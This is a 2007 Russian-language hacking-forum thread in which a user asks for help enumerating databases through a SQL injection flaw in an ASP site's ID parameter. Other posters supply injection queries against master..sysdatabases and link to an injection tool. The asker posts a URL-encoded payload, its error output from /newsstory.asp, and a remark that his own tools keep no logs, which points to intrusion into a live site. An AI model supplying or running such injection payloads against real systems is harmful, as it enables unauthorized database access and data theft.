MSSQL Injection вопрос

Discussion in 'Песочница' started by sh-smoker, 16 Aug 2007.

  1. sh-smoker

    sh-smoker New Member

    Joined:
    13 Jan 2007
    Messages:
    29
    Likes Received:
    2
    Reputations:
    -27
    Каким методом можно получить список существующих баз данных?
     
    #1 sh-smoker, 16 Aug 2007
  2. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    show databases;
     
    _________________________
    #2 +toxa+, 16 Aug 2007
  3. sh-smoker

    sh-smoker New Member

    Joined:
    13 Jan 2007
    Messages:
    29
    Likes Received:
    2
    Reputations:
    -27
    Это не то. Мне через багу в скрипте надо узнать все существующие базы.

    запрос типа .asp?ID=1'INJECTION
     
    #3 sh-smoker, 16 Aug 2007
  4. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    http://hack-shop.org.ru/board/showthread.php?t=24
     
    #4 guest3297, 16 Aug 2007
  5. sh-smoker

    sh-smoker New Member

    Joined:
    13 Jan 2007
    Messages:
    29
    Likes Received:
    2
    Reputations:
    -27
    спасибо, помог :)
    Только что-то select top 2 start at 1 не пашет

    на единицу ругается Incorrect syntax near '1'
     
    #5 sh-smoker, 16 Aug 2007
  6. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    чтоб все поперебирать можно так select top 1 name from master..sysdatabases where name not in ('master','tempdb','bla bla','и так далее')
     
    #6 ShAnKaR, 16 Aug 2007
  7. sh-smoker

    sh-smoker New Member

    Joined:
    13 Jan 2007
    Messages:
    29
    Likes Received:
    2
    Reputations:
    -27
    я знаю, но кавычки ставить нельзя.
     
    #7 sh-smoker, 16 Aug 2007
  8. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Запрос гласит вывести 2 строчки начиная с 1
     
    #8 guest3297, 16 Aug 2007
  9. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    можно использывать order by checksum
     
    #9 guest3297, 16 Aug 2007
  10. sh-smoker

    sh-smoker New Member

    Joined:
    13 Jan 2007
    Messages:
    29
    Likes Received:
    2
    Reputations:
    -27
    -1+or+1=(select+top+1+start+at+2+name+from+master..sysdatabases)--

    ответ:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '1'.

    /newsstory.asp, line 15


    что означает, это выражение я понял, не могу понять в чем ошибка синтаксиса
     
    #10 sh-smoker, 16 Aug 2007
  11. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    а так пробывали?
     
    #11 guest3297, 16 Aug 2007
  12. sh-smoker

    sh-smoker New Member

    Joined:
    13 Jan 2007
    Messages:
    29
    Likes Received:
    2
    Reputations:
    -27
    Теперь на at ругается :)

    Incorrect syntax near 'at'.
     
    #12 sh-smoker, 16 Aug 2007
  13. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Скажу по секрету такая конструкция в принцыпе не должна работать хоть я и не тестил...

    http://hack-shop.org.ru/mssql.php

    Get db
     
    #13 guest3297, 16 Aug 2007
  14. sh-smoker

    sh-smoker New Member

    Joined:
    13 Jan 2007
    Messages:
    29
    Likes Received:
    2
    Reputations:
    -27
    Ладно, спасибо ты мне кое в чем всетаки помог и не впервые ;)
    Насчет скрипта http://hack-shop.org.ru/mssql.php, спасиб не нужно, у меня свои есть.
    На моих скриптах логи не ведутся))))))
     
    #14 sh-smoker, 16 Aug 2007
  15. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    sh-smoker
    может тебе есть смысл в аську стучать )
     
    #15 guest3297, 16 Aug 2007
  16. sh-smoker

    sh-smoker New Member

    Joined:
    13 Jan 2007
    Messages:
    29
    Likes Received:
    2
    Reputations:
    -27
    Так теперь и буду делать ;)
     
    #16 sh-smoker, 16 Aug 2007
  17. xena-mil1

    xena-mil1 Elder - Старейшина

    Joined:
    17 Oct 2006
    Messages:
    13
    Likes Received:
    21
    Reputations:
    0
    dddddd
     
    #17 xena-mil1, 16 Aug 2007
    Last edited: 29 Aug 2008
    1 person likes this.
(You must log in or sign up to post here.)
Loading...
Similar Threads - MSSQL Injection вопрос
  1. gilo20

    Вопрос по шеллу

    gilo20, 26 Feb 2023, in forum: Песочница
    Replies:
    2
    Views:
    2,480
    crlf
    27 Feb 2023
  2. Dobi768

    Вопрос про nmap ssh-hostkey

    Dobi768, 14 Jan 2023, in forum: Песочница
    Replies:
    2
    Views:
    2,403
    Dobi768
    14 Jan 2023
  3. avva99on

    Вопрос по движку UMI.CMS

    avva99on, 15 Dec 2022, in forum: Песочница
    Replies:
    0
    Views:
    2,402
    avva99on
    15 Dec 2022
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.